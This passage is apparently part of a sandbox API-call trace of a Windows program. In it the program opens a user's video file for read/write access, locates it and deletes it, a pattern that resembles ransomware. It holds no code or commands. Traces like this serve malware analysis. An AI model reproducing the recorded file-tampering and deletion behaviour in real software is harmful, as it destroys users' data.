wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.057] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.057] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.057] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.058] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.059] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.059] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0196.059] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\g9kkkj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0196.059] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.060] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.060] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0196.060] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.060] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.060] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.060] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.060] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.061] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.061] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.061] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.061] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0196.061] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.061] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.061] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.061] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.061] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.061] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.062] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4", lpFilePart=0x0) returned 0x51 [0196.062] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x19c56640, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 0x90ae18 [0196.062] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\g9kkkj.mp4")) returned 1 [0196.064] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dae39b0, ftCreationTime.dwHighDateTime=0x1d5dc44, ftLastAccessTime.dwLowDateTime=0x50adf490, ftLastAccessTime.dwHighDateTime=0x1d5e44d, ftLastWriteTime.dwLowDateTime=0x19c56640, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xab9c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="g9kkkj.mp4", cAlternateFileName="")) returned 0 [0196.064] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0196.067] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0196.068] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0196.070] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0196.070] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.070] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0196.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0196.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0196.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0196.071] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0196.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0196.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0196.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0196.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.072] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0196.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0196.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0196.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.074] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0196.074] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0196.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0196.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0196.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0196.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0196.075] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0196.075] RtlAllocateHeap 